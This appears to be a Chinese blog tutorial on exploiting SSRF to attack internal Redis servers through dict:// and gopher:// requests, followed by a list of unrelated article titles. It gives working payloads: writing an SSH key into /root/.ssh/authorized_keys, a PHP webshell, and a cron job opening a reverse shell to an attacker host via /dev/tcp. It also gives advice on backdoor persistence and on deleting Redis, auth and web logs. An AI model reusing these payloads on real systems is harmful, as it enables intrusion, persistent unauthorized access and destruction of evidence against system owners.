当前位置：首页 > article >正文

别再只测SSRF读内网了：手把手教你用dict/gopher协议探测并攻击内网Redis服务

article 2026/5/12 6:40:57

从SSRF到内网Redis渗透实战进阶指南发现SSRF漏洞只是开始真正的挑战在于如何将其转化为实际的攻击路径。当目标内网存在Redis服务时一个看似简单的SSRF可能成为整个内网沦陷的起点。本文将带你深入探索如何通过dict和gopher协议将SSRF漏洞的利用价值最大化。1. 内网Redis服务的基础探测在确认存在SSRF漏洞后第一步是识别内网中开放的Redis服务。不同于简单的端口扫描我们需要更隐蔽且有效的方法。使用dict协议进行指纹识别dict://target:6379/info这个简单的命令可以返回Redis服务的详细信息包括版本号、运行模式、操作系统等关键数据。如果返回包含redis_version字段基本可以确认目标为Redis服务。常见响应分析未授权访问直接返回完整信息需要认证返回NOAUTH Authentication required非Redis服务返回错误或无关信息提示dict协议的优势在于其简洁性大多数防火墙不会拦截这种看似无害的字典协议请求。信息收集的关键指标Redis版本某些版本存在已知漏洞操作系统决定后续攻击方式的选择持久化配置影响写入文件的成功率内存使用情况判断服务是否活跃2. Redis未授权访问的确认与利用确认Redis服务存在只是第一步更重要的是判断是否可利用。未授权访问的Redis服务是内网渗透中最理想的攻击目标。三种快速验证方法直接执行命令dict://target:6379/set test exploit如果返回OK说明可执行任意命令查看数据库配置dict://target:6379/config get *返回的配置信息可能包含敏感路径尝试关闭服务dict://target:6379/shutdown谨慎使用可能导致服务中断风险评估矩阵风险等级判断标准可利用性高危完全未授权可执行任意命令直接攻击中危需要弱密码认证可尝试爆破低危强密码保护或网络隔离难以利用3. 从探测到攻击Gopher协议的实战应用当dict协议确认目标可攻击后gopher协议将成为我们的主要武器。它能构造完整的Redis协议格式请求实现更复杂的攻击。Gopher协议攻击的基本结构gopher://target:6379/_[Redis协议格式的命令]需要将命令转换为Redis协议格式包括用*号表示参数个数$号后跟参数长度实际参数内容三种经典攻击方式详解3.1 写入SSH公钥获取系统权限这是最直接的提权方法前提是Redis以root权限运行。生成SSH密钥对ssh-keygen -t rsa -C exploit构造Redis命令set sshkey \n\n公钥内容\n\n config set dir /root/.ssh/ config set dbfilename authorized_keys save转换为gopher格式gopher://target:6379/_*3%0d%0a$3%0d%0aset%0d%0a$6%0d%0asshkey%0d%0a$...省略完整编码3.2 写入Webshell控制网站当目标服务器同时运行Web服务时这种方法尤为有效。关键步骤确定Web根目录通过info命令或猜测常见路径构造恶意PHP代码set shell ?php system($_GET[cmd]);? config set dir /var/www/html/ config set dbfilename shell.php save注意成功率取决于Web目录的写权限和Redis运行权限3.3 通过计划任务实现持久化在Linux系统下可以通过写入crontab实现长期控制。特殊考虑需要知道当前用户名系统需启用cron服务Redis需要有写入/etc/cron.d/的权限示例payloadset task \n* * * * * bash -i /dev/tcp/attacker/4444 01\n config set dir /etc/cron.d/ config set dbfilename redis-exploit save4. 不同环境下的攻击变通方案实际渗透中理想情况很少见。以下是几种常见限制及应对策略。网络隔离情况Redis仅监听127.0.0.1尝试SSRFRedis主从复制攻击存在防火墙规则使用DNS外带数据确认连通性出站流量受限尝试反弹shell到内部其他可达主机Redis配置防护启用了protected-mode尝试低权限操作配置了rename-command分析可用的命令别名内存限制严格使用短小精悍的payload权限限制场景Redis以低权限运行尝试写入用户目录而非系统目录存在SELinux/AppArmor优先考虑Web目录写入文件系统只读转向信息窃取或作为跳板5. 攻击后的痕迹清理与持久化成功入侵后如何保持访问并隐藏踪迹同样重要。日志清理要点Redis日志修改或删除/var/log/redis/redis-server.log系统日志检查/var/log/auth.log和/var/log/syslogWeb日志如果写入webshell清理相关访问记录隐蔽持久化方法在.bashrc或.profile中添加后门创建隐藏的SSH授权密钥部署内存驻留型木马利用系统服务实现自启动在实际渗透测试中Redis服务的利用方式远不止文中提到的几种。每个内网环境都有其独特性需要根据实际情况灵活调整攻击策略。我曾遇到过一个案例通过Redis主从复制功能成功绕过了网络隔离限制最终拿下了整个内网的控制权。这种层层递进的攻击路径正是内网渗透的魅力所在。

别再只测SSRF读内网了：手把手教你用dict/gopher协议探测并攻击内网Redis服务

相关文章：

别再只测SSRF读内网了：手把手教你用dict/gopher协议探测并攻击内网Redis服务

牛津树资源合集

从 LLM 到 Agent Skill

AI CLI Kit：让AI助手生成环境感知的精准命令行指令

3分钟学会Xbox Game Pass存档提取：免费工具实现跨平台游戏进度迁移

2026年市面上的培训机构管理系统对比，谁才是性价比之王

大模型赛道岗位大揭秘：小白也能轻松入行的5大方向！

ARM链接器命令行选项优化与实战技巧

ensp关闭完美世界运行时显示权限不够

RFID电动车智能门禁管理系统技术采用四层架构设计，实现电动车智能化管理。感知层采用防水防撕RFID电子车牌；识别层配置3-4米远距离读卡器；控制层集成ARM7处理器；执行层通过电动道闸或摆闸或广告门

基于OpenClaw协议的轻量级AI代理网关MiniClaw实战指南

dotUI设计系统生成器：基于品牌配置一键生成React组件库

西门子S7-300/400老系统改造：用DP/DP Coupler打通新旧产线数据（附Step7组态避坑点）

HDFS源码（二）

苍穹外卖项目记录第四天

XT2055 双灯显示微型线性电池充电管理芯片

多说话人场景下的设备定向语音检测技术解析

第1篇：认识Go——我的第一个程序 Go中文编程

中国移联AI元宇宙产业委调研阿尔特汽车科技园构建高精尖产业的“技术-场景-商业”融合生态

Butlerclaw：OpenClaw AI Agent的图形化桌面管理工具

基于微信小程序的家政服务预约系统（30291）

英雄联盟游戏效率工具League Akari：智能自动化与数据分析完整指南

软考（系统架构师）-论分布式缓存架构设计及其应用

Android本地AI语音助手Cliff：开源、离线与可定制的边缘计算实践

终极指南：快速掌握碧蓝航线Live2D资源提取技术

大语言模型越狱攻防全景：从对抗攻击到安全防御实践

二十七、RZN2L CherryUSB移植与性能对比

为什么你需要m4s-converter：让B站缓存视频重获自由的秘密武器

告别硬件！用OneNET官方simulate-device工具5分钟搞定MQTT设备云端调试

别再手动下载了！用Chocolatey在Windows上一键安装Zookeeper 3.8.0